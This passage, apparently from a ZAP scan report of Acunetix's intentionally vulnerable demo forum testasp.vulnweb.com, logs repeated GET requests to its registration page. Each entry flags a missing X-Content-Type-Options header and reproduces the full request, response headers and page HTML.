Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | GET |
| Parameter | X-Content-Type-Options |
